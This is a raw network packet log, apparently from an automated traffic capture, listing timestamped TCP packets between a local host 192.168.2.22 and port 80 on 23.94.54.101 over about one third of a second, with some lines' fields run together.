May 2, 2024 17:39:46.327189922 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.327213049 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
                                        May 2, 2024 17:39:46.327279091 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327287912 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.327361107 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327399015 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.327425957 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327490091 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327528000 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.327563047 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327630043 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327667952 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.327702999 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327770948 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327810049 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.327831030 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327892065 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.327930927 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.327964067 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.328031063 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.328069925 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.328093052 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.328186035 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.328223944 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.328233004 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.332508087 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.434537888 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.434555054 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.434565067 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.434582949 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.434623003 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.434638977 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.434676886 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.434720993 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.434734106 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.434783936 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.434828997 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.434904099 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.435005903 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.435050011 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.435101986 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.435205936 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.435250044 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.435269117 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.436857939 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.436922073 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.436943054 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.436955929 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.436966896 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.436978102 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.436994076 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.436995029 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.437020063 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.437057972 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437092066 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437097073 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.437247038 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437289000 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.437292099 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437305927 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437328100 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437350988 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.437359095 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437402964 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.437413931 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437427044 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437438011 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437470913 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.437498093 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437510967 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437524080 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437535048 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437552929 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.437568903 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.437585115 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437652111 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.437694073 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.438009977 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.441952944 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442042112 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442054987 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442089081 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442100048 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442116022 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.442133904 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.442187071 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442260981 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442271948 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442285061 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442296982 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442307949 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.442332029 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.442342043 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442359924 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442404985 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.442462921 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442543030 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.442579031 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.442615032 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.443574905 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.544262886 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.544301033 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.544342995 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.544394970 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.544445038 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.544492960 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.544517994 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.544639111 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.544682980 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.544743061 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.544806004 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.544848919 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.544934034 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545043945 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545084953 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.545089006 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545144081 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545196056 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.545229912 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545278072 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545324087 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.545362949 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545478106 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545525074 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.545550108 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545619965 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545661926 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.545681000 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545840025 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.545883894 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.546005011 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546066999 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546109915 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.546140909 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546175957 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546220064 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.546408892 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546493053 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546534061 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.546555996 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546580076 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546622038 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.546646118 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546734095 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546746969 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546776056 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.546828985 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546854973 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546873093 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.546926975 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.546962976 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.546993017 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547032118 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.547043085 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547106981 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547144890 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.547153950 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547300100 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547336102 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.547344923 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547399044 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547436953 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.547460079 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547508955 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547545910 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.547566891 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547627926 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547667980 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.547676086 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547841072 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547852993 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547878027 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.547921896 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.547961950 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.547985077 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548142910 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548182011 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.548233986 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548403025 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548414946 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548439026 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.548460960 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548501968 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.548527002 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548587084 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548636913 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548640966 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.548713923 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548758984 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.548773050 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548830986 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548871040 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.548908949 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.548974037 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.549009085 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.549021006 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.549164057 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.549201965 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.549279928 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.549391031 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.549429893 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.549439907 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.549562931 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.549601078 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.549659967 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.551883936 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.551930904 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.551939011 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552021980 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552056074 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552061081 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.552175045 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552215099 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.552222013 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552337885 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552351952 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552370071 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552377939 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.552407980 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.552424908 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552545071 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552582979 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.552598953 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.552644014 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552757978 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552794933 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.552903891 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552917004 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552944899 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.552953005 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.553004980 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553036928 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553044081 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.553111076 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553150892 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.553172112 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553247929 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553287029 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.553287983 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553354025 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553391933 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.553416014 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553479910 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553515911 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.553567886 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553618908 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553663015 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.553685904 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553736925 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.553774118 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.553783894 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.562836885 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.564209938 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.653971910 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.654036999 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.654050112 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.654083014 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.654151917 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.654225111 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.654277086 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.654300928 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.654393911 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.654443026 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.654478073 CEST804916123.94.54.101192.168.2.22
May 2, 2024 17:39:46.654836893 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.654879093 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.654932976 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.654999971 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655049086 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.655062914 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655128956 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655169964 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.655194044 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655245066 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655287027 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.655322075 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655401945 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655446053 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.655503035 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655591965 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655635118 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.655658007 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655726910 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655771017 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.655858040 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655939102 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.655980110 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.655989885 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656104088 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656141996 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.656157017 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656245947 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656282902 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.656337976 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656383991 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656425953 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.656430006 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656466007 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656502962 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.656526089 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656596899 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656644106 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.656682014 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656765938 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656855106 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656878948 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.656933069 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.656974077 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.657023907 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657088041 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657130003 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.657159090 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657229900 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657269955 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.657320976 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657409906 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657454967 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.657495975 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657584906 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657629013 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.657649994 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657663107 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.657696962 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.658175945 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658277988 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658320904 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.658339024 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658436060 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658477068 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.658530951 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658585072 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658638000 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.658701897 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658715010 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658739090 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658763885 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.658828974 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658870935 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.658899069 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.658967972 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659003973 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.659077883 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659204960 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659248114 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.659323931 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659380913 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659425020 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.659465075 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659547091 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659589052 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.659614086 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659708977 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659759045 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.659792900 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659908056 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.659950972 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.659981012 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660080910 CEST  80  49161  23.94.54.101  192.168.2.22
